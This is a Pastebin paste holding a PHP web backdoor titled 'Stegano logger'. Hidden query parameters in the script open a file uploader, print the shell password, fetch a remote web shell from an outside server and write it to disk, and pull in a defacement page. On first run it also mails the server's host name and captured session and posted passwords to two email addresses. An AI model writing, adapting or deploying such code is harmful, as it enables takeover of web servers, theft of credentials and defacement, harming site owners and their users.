Advertisement
Ribang

Stegano logger

Jan 22nd, 2018
288
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.33 KB | None | 0 0
  1. <?php
  2. $up = " <html>
  3. <head>
  4. <title>Uploader By FirewalL21</title>
  5. </head>
  6. <body>
  7. <center>
  8. <h1><font face=\"Tahoma\" size=\5\" color=\"#blue\">FirewalL21 Uploader</font></h1>
  9. <form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">
  10. <table border=\"1\">
  11. <tr>
  12. <td bgcolor=\"#000000\">
  13. <font color=\"#00ff00\">
  14. <input type=\"file\" name=\"file\" size=\"50\">
  15. <td bgcolor=\"#ff0000\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload File\">
  16. </td>
  17. </td>
  18. </tr>
  19. </table>
  20. </form>
  21. </center>
  22. </body>";
  23.  
  24. if( $_POST['_upl'] == "Upload File" ) {
  25. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
  26. echo '<b><center>
  27. <font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">SUKSES UPLOAD MASTAH !!</center></b>';
  28. }
  29. else {
  30. echo '
  31. <font face=\"Tahoma\" size=\"5\" color=\"#ff0000\"><center><b>GAGAL UPLOAD MASTAH !</b>';
  32. }
  33. }
  34. if(isset($_GET["0upload"])){
  35. echo "$up";
  36. }
  37. /////////////////////////////
  38. if(isset($_GET["0cek"])){
  39. echo "Password E :".$auth_pass;
  40. }
  41. /////////////////////////////
  42. if (file_exists('.db'))
  43. { } else {
  44. /*$to = "ransom.tenwap@gmail.com,aksesroot1337@gmail.com";
  45. $subject = $_SERVER['SERVER_NAME'];
  46. $header = "From: Mastah <jancok@matamucok.com>";
  47. $message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
  48. mail($to, $subject, $message, $header);*/
  49. $pass1 = $_SESSION['pass'];
  50. $pass2 = $_POST['pass'];
  51. $ip = $_SERVER['SERVER_ADDR'];
  52. $info = $_SERVER['HTTP_HOST'].'/'.$_SERVER['PHP_SELF'];
  53. $msg = "Host: $info | Session Pass: $pass1 & Post Pass: $pass2";
  54. mail("ransom.tenwap@gmail.com,aksesroot1337@gmail.com","ActShellV.2: $ip",$msg);
  55. $m = fopen(".db", "w") or die (" ");
  56. $txt = "";
  57. fwrite($m, $txt);
  58. fclose($m);
  59. chmod(".db",0644); }
  60. /////////////////////////////
  61. if(isset($_GET["0shell"])){
  62. $anak1 = file_get_contents("http://server.indoxploit.or.id/indoxploit_v3.txt");
  63. $nggawe1 = fopen("firewall21.php","w") or die ("gabisa pak");
  64. fwrite($nggawe1,$anak1);
  65. fclose($nggawe1);
  66. header ("Location:firewall21.php");
  67. chmod("firewall21.php",0644);}
  68. //////////////////////////////
  69. if(isset($_GET["0deface"])){
  70. $anak = file_get_contents("https://pastebin.com/raw/HymYrpHG");
  71. $nggawe = fopen("firewall21.htm","w") or die ("gabisa pak");
  72. fwrite($nggawe,$anak);
  73. fclose($nggawe);
  74. header ("Location:firewall21.htm");}
  75. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement